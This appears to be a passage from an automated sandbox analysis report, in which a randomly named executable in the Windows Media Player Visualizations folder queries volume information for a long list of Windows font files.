                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
